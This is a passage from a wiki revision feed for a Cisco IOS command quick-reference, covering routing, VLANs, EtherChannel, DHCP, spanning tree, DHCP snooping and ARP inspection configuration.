&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using default administrative distance values listed in the section below.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example manually defining the administrative distance&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! Routing protocol !! Administrative distance&lt;br /&gt;
|-&lt;br /&gt;
| Directly connected interface || 0 (Only the interface itself has an administrative distance of 0, since a route cannot have a distance of less than 1.)&lt;br /&gt;
|-&lt;br /&gt;
| Static route || 1&lt;br /&gt;
|-&lt;br /&gt;
| Dynamic Mobile Network Routing (DMNR) || 3&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP summary route || 5&lt;br /&gt;
|-&lt;br /&gt;
| External BGP || 20&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP internal route || 90&lt;br /&gt;
|-&lt;br /&gt;
| IGRP || 100&lt;br /&gt;
|-&lt;br /&gt;
| Open Shortest Path First (OSPF) || 110&lt;br /&gt;
|-&lt;br /&gt;
| Intermediate System to Intermediate System (IS-IS) || 115&lt;br /&gt;
|-&lt;br /&gt;
| Routing Information Protocol (RIP) || 120&lt;br /&gt;
|-&lt;br /&gt;
| Exterior Gateway Protocol (EGP) || 140&lt;br /&gt;
|-&lt;br /&gt;
| On Demand Routing (ODR) || 160&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP external route || 170&lt;br /&gt;
|-&lt;br /&gt;
| Internal BGP || 200&lt;br /&gt;
|-&lt;br /&gt;
| Next Hop Resolution Protocol (NHRP) || 250&lt;br /&gt;
|-&lt;br /&gt;
| Default static route learned via DHCP || 254&lt;br /&gt;
|-&lt;br /&gt;
| Unknown and unused || 255 (An administrative distance of 255 causes the router to remove the route from the routing table and not use it.)&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1123</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1123"/>
		<updated>2026-02-23T22:40:00Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Administrative Distance */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway (switch) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
